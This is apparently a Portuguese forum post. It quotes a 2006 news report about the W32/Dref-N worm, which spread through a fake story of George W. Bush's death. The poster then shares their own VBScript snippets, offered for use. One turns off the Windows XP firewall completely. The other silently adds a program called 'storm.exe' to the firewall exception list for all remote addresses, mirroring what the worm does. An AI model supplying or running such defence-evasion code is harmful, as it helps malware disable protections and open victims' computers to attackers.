|
Novo vírus ataca por meio de falsa notícia sobre a morte de Bush |
|
|
|
|
Por Staff
|
|
09 de November de 2006 |
|
Um
novo vírus utiliza uma notícia falsa sobre a morte do presidente dos
Estados Unidos, George W. Bush, para convencer suas vítimas a clicar em
um programa nocivo.
A praga virtual, batizada como W32/Dref-N
também pode ser encontrada em mensagens sobre o início de uma guerra
nuclear ou mesmo o assassinato do presidente russo Vladimir Putin.
Ao
clicar no arquivo anexo (que chega como uma mensagem enviada por um
conhecido, pois o vírus se utiliza da lista de endereços da máquina
infectada), o internauta desabilita o firewall do Windows e abre o
computador para o ataque de hackers. Além disso, baixa outros arquivos
nocivos para o PC da vítima...
Fiz um código para isto há algum tempo;
Este script permite desabilitar por completo o firewall do Windows XP,
Código:
Set Firewall = CreateObject("HNetCfg.FwMgr") Set Politica = Firewall.LocalPolicy.CurrentProfile Politica.FirewallEnabled = FALSE
Apenas decidir, podemos trocar o FALSE por um TRUE e está habilitado novamente o Firewall do Windows XP
====//====
Adicionar em modo silencioso um programa na lista de exceções:
Permite adicionar um arquivo na lista de exceções do Firewall, podemos
selecionar algunos parametros tais como o nome da aplicação, a rota e
muitas coisas...
Código:
Set objFirewall = CreateObject("HNetCfg.FwMgr") Set objPolicy = objFirewall.LocalPolicy.CurrentProfile Set objApplication = CreateObject("HNetCfg.FwAuthorizedApplication") objApplication.Name = "Storm.exe - Aplicação" objApplication.IPVersion = 2 objApplication.ProcessImageFileName = "C:\Windows\System32\storm.exe" objApplication.RemoteAddresses = "*" objApplication.Scope = 0 objApplication.Enabled = True Set colApplications = objPolicy.AuthorizedApplications colApplications.Add(objApplication)
Para saber mais sobre a ameaça clique aqui.
|
